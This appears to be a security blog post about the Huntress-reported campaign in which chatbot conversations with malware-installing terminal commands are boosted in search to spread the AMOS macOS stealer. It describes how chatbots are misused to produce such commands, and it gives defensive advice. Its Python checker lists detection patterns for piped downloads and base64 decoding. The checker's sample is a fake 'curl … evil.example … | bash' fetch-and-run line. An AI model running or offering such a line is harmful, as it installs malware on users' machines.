Hackers seed search results with AI‑generated commands that install malware — the AMOS case and how to protect yourself
Security firm Huntress has flagged a worrying new social‑engineering tactic: attackers use AI assistants to craft dangerous terminal commands, publish the chat publicly, then pay to boost that page in Google search results. Unsuspecting users searching for how‑to instructions may copy and paste the suggested command and unknowingly install malware such as AMOS (Atomic macOS Stealer).
The attack chain is simple but effective. An attacker prompts a chatbot (Huntress tested ChatGPT and Grok) to generate a shell command for a common task — for example, “clear disk space on Mac” — posts the conversation publicly, and sponsors or boosts the link so it ranks for the query. When a user clicks the result and pastes the command into their terminal, the machine executes the malicious payload.
Why this is especially dangerous
- No download, no attachment: the victim runs a command directly — traditional phishing red flags are often absent.
- Source trust: high‑ranking search results and outputs from well‑known chatbots create misplaced trust.
- Rapid spread: boosted pages can appear at the top of search results quickly, exposing many users before removal.
Practical safety steps
- Don’t paste commands you don’t understand. Break commands into parts and research each token or flag before running them.
- Verify sources. Prefer official documentation, vendor knowledge bases, GitHub, or established community threads (Stack Overflow) over random boosted pages or chat logs.
- Test in a sandbox. Use a disposable VM or container to run unfamiliar commands first, isolated from your primary system and data.
- Inspect scripts before execution. Open copied scripts in a text editor and look for piped downloads such as curl | sh or wget | bash, which fetch and run remote code sight unseen, as well as obfuscation like base64‑encoded payloads.
- Harden systems and back up. Keep backups, enable disk encryption and anti‑malware, and limit administrative access on daily accounts.
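The "inspect before you run" step above can be partially automated. Below is a minimal sketch of a heuristic checker for pasted commands; the regex patterns, warning strings, and the sample URL are illustrative assumptions, not a complete or authoritative detection list.

```python
import re

# Heuristic red flags commonly seen in malicious copy-paste one-liners.
# A minimal sketch only; it does not replace reading the command yourself.
RISKY_PATTERNS = [
    (re.compile(r"(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(sh|bash|zsh)\b"),
     "downloads a remote script and pipes it straight into a shell"),
    (re.compile(r"base64\s+(-d|-D|--decode)\b"),
     "decodes a base64 payload, a common obfuscation step"),
    (re.compile(r"\bsudo\b"),
     "requests administrative privileges"),
]

def flag_risky(command: str) -> list[str]:
    """Return a warning for each suspicious construct found in the command."""
    return [reason for pattern, reason in RISKY_PATTERNS if pattern.search(command)]

# Example: a fake 'disk cleanup' one-liner of the kind described above
# (evil.example is a fabricated placeholder URL).
print(flag_risky("curl -fsSL https://evil.example/cleanup.sh | bash"))
# → ['downloads a remote script and pipes it straight into a shell']
```

An empty result from a checker like this proves nothing; it only surfaces the most common red flags so you know which parts of a command to research before running it.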
What Huntress discovered
Huntress traced a Mac‑targeting data‑exfiltration campaign (AMOS) back to a search result promoting a malicious ChatGPT conversation. The boosted link stayed indexed for hours before removal, demonstrating how quickly this vector can reach victims. Their tests showed that multiple chatbots could reproduce the malicious commands when prompted.
Implications
This technique highlights the need for caution when following instructions from search results or conversational AI. As attackers adapt, defenders should combine user education, better search and AI safety practices, and platform responses (e.g., rapid takedown of malicious boosted content).
Further reading: Huntress analysis · Engadget coverage.
Discussion: Have you ever pasted a command you later regretted? What practices or tools help you verify terminal commands before running them?
